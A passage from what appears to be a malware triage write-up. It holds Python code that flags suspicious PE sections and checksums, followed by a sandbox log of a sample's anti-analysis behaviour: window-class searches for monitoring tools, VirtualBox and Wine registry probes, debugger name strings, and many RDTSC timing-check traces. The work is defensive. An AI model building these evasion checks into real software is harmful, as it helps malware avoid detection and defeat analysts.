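    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                # optional header follows the 20-byte COFF header
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    stored = struct.unpack_from("<I", data, opt + 64)[0]
    computed = pe_checksum(data, opt + 64)
    sections, flags = [], []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i                  # IMAGE_SECTION_HEADER is 40 bytes
        name = data[hdr:hdr + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, hdr + 8)
        chars = struct.unpack_from("<I", data, hdr + 36)[0]
        perms = "".join(flag for flag, bit in PERM_BITS if chars & bit)
        entropy = shannon_entropy(data[rawptr:rawptr + rawsize])
        sections.append({"name": name, "va": va, "size": max(vsize, rawsize),
                         "perms": perms, "entropy": round(entropy, 3)})
        if name not in STANDARD_SECTIONS:
            flags.append(f"non-standard section name: {name!r}")
        if "E" in perms and "W" in perms:
            flags.append(f"writable and executable section: {name!r}")
        if entropy > 7.0:
            flags.append(f"high-entropy section: {name!r} ({entropy:.2f} bits/byte)")
    entry_section = next((s["name"] for s in sections
                          if s["va"] <= entry_rva < s["va"] + s["size"]), None)
    if entry_section not in CODE_SECTIONS:
        flags.append(f"entry point 0x{entry_rva:X} lies in section {entry_section!r}")
    if stored != computed:
        flags.append(f"checksum mismatch: stored 0x{stored:X}, computed 0x{computed:X}")
    return {"entry_section": entry_section, "checksum_stored": stored,
            "checksum_computed": computed, "sections": sections, "flags": flags}


def with_checksum(data: bytes) -> bytes:
    """Copy of the image with the CheckSum field set to the recomputed value."""
    off = struct.unpack_from("<I", data, 0x3C)[0] + 24 + 64
    buf = bytearray(data)
    struct.pack_into("<I", buf, off, pe_checksum(data, off))
    return bytes(buf)


def _section_header(name: bytes, va: int, size: int, rawptr: int, chars: int) -> bytes:
    return struct.pack("<8sIIIIIIHHI", name, size, va, size, rawptr, 0, 0, 0, 0, chars)


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 for the demo (not the real sample): .text plus a packed-looking 'pvfmcbmp'."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)                                   # e_lfanew
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x14C, 2, 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                                     # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2010)                                   # AddressOfEntryPoint
    hdrs = bytes(dos) + coff + bytes(opt)                                     # CheckSum field left at 0
    hdrs += _section_header(b".text", 0x1000, 0x200, 0x200, 0x60000000)      # E|R
    hdrs += _section_header(b"pvfmcbmp", 0x2000, 0x200, 0x400, 0xE0000000)   # E|R|W
    hdrs += b"\0" * (0x200 - len(hdrs))
    text = b"\x90" * 0x1F0 + b"\xC3" * 0x10      # low entropy: nops and rets
    packed = bytes(range(256)) * 2                # uniform byte distribution: 8.0 bits/byte
    return hdrs + text + packed
```

`triage()` takes the raw bytes of any PE (`triage(open(path, "rb").read())`) and returns the per-section table plus the flags; on the constructed image it reports the `pvfmcbmp` entry point, the writable and executable section, the 8.0 bits/byte entropy and the checksum mismatch. `with_checksum()` is the inverse operation, which is also exactly how a packer hides the mismatch, so the other flags deserve more weight.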

Boot Survival

Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\5Jat5RkD3a.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B1E0C6 second address: B1E0CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B1E0CA second address: B1E0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD934BC97D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD934BC97E2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B1D4F5 second address: B1D4FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B1D924 second address: B1D928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B20451 second address: B20455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B20455 second address: B2045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B2045B second address: B20465 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD934C4561Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B20465 second address: B2048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jc 00007FD934BC97DEh 0x0000000d push esi 0x0000000e jp 00007FD934BC97D6h 0x00000014 pop esi 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jno 00007FD934BC97DCh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B2048C second address: B20493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B20493 second address: B204B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007FD934BC97E6h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B204B6 second address: B204BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B204BB second address: B204C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B204FE second address: B2053E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jp 00007FD934C4562Dh 0x0000000e push esi 0x0000000f jmp 00007FD934C45625h 0x00000014 pop esi 0x00000015 nop 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 mov ebx, dword ptr [ebp+122D1C65h] 0x0000001f add eax, 095DAEA1h 0x00000025 popad 0x00000026 push 2BECB199h 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B2053E second address: B20542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B20542 second address: B20546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B20546 second address: B205AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 xor dword ptr [esp], 2BECB119h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FD934BC97D8h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D3244h], ebx 0x0000002e add esi, dword ptr [ebp+122D2B42h] 0x00000034 push 00000003h 0x00000036 mov dx, cx 0x00000039 movzx ecx, cx 0x0000003c push 00000000h 0x0000003e mov ecx, 11196BA6h 0x00000043 pushad 0x00000044 mov edx, dword ptr [ebp+122D17DEh] 0x0000004a add eax, dword ptr [ebp+122D2936h] 0x00000050 popad 0x00000051 push 00000003h 0x00000053 sub di, 4542h 0x00000058 push 8496F0F1h 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B205AD second address: B205B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B207AA second address: B207AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B207AE second address: B207B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B207B8 second address: B207BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B33664 second address: B33668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B13D54 second address: B13D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD934BC97D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B13D5E second address: B13D6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EDD9 second address: B3EDE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EDE1 second address: B3EDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EDE5 second address: B3EDF9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD934BC97D6h 0x00000008 jnl 00007FD934BC97D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EDF9 second address: B3EE2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45629h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD934C45620h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EE2B second address: B3EE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EF98 second address: B3EFBA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FD934C4561Eh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jbe 00007FD934C45616h 0x00000016 push edx 0x00000017 pop edx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3EFBA second address: B3EFE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007FD934BC97E8h 0x0000000c popad 0x0000000d js 00007FD934BC97DEh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F13C second address: B3F154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934C45622h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F154 second address: B3F16C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F16C second address: B3F178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F2EF second address: B3F2F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F43C second address: B3F448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007FD934C45616h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F448 second address: B3F44C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F702 second address: B3F73C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FD934C4561Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 jmp 00007FD934C4561Fh 0x00000016 jnc 00007FD934C4561Ch 0x0000001c popad 0x0000001d push edi 0x0000001e pushad 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F9FB second address: B3F9FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3F9FF second address: B3FA03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3FA03 second address: B3FA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD934BC97D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3FA0F second address: B3FA43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45622h 0x00000007 jnp 00007FD934C45622h 0x0000000d jns 00007FD934C45616h 0x00000013 jl 00007FD934C45616h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jg 00007FD934C45616h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3FA43 second address: B3FA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B3FA47 second address: B3FA4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B34C91 second address: B34CB0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD934BC97D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007FD934BC97E1h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B34CB0 second address: B34CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B403AC second address: B403B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B403B0 second address: B403C7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD934C45616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jne 00007FD934C45616h 0x00000013 popad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B403C7 second address: B403CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B403CD second address: B40404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jno 00007FD934C45618h 0x0000000b popad 0x0000000c jo 00007FD934C45658h 0x00000012 push edi 0x00000013 jmp 00007FD934C45629h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FD934C45616h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B40810 second address: B40817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B46ED7 second address: B46EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007FD934C4561Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4854C second address: B48564 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD934BC97DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B48564 second address: B4857B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45623h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4857B second address: B48581 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B48581 second address: B48585 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D808 second address: B4D817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D817 second address: B4D82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C45624h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4CC8B second address: B4CC92 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4CC92 second address: B4CCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 jl 00007FD934C45616h 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 je 00007FD934C45616h 0x00000017 push eax 0x00000018 pop eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4CCAF second address: B4CCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4CCB5 second address: B4CCBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D05C second address: B4D060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D357 second address: B4D388 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45628h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a jnc 00007FD934C45616h 0x00000010 jmp 00007FD934C4561Dh 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D388 second address: B4D38D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D38D second address: B4D393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D393 second address: B4D399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D4D5 second address: B4D4DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D4DD second address: B4D512 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FD934BC97DAh 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 jng 00007FD934BC97D6h 0x0000001b jmp 00007FD934BC97E8h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D512 second address: B4D525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD934C4561Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D525 second address: B4D52E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exeRDTSC instruction interceptor: First address: B4D6B3 second address: B4D6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FD934C45622h 0x0000000a jbe 00007FD934C45616h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
